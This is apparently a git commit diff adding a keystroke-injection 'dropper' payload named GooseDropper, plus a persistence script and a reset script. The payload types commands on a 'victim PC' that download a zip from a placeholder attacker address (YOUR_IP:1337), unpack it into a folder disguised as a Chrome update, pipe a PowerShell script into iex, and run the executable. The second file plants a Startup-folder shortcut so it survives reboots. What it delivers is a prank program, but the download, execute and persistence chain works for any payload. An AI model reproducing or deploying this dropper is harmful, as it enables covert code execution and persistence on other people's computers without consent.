Dropper v2.0

2023-10-31 15:10:53 -06:00
parent 51df053bc7
commit 665b59a62a
10 changed files with 122 additions and 23 deletions
@@ -0,0 +1,23 @@
+REM TITLE GooseDropper
+REM AUTHOR Fr3ki
+REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
+ENTER
+DELAY 8000
+GUI r
+DELAY 500
+STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
+ENTER
+DELAY 3000
+GUI r
+DELAY 500
+STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
+ENTER
+DELAY 1000
+GUI r
+DELAY 500
+STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
+ENTER
@@ -0,0 +1,6 @@
+$WScriptShell = New-Object -ComObject WScript.Shell
+$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
+$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
+$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
+$Shortcut.TargetPath = $TargetFile
+$Shortcut.Save()
@@ -0,0 +1,6 @@
+#!/bin/bash
+
+cp PersistentGoose.ps1.bk PersistentGoose.ps1
+cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip"
+cp GooseDropper.txt.bk GooseDropper.txt
+rm Chrome_Update.zip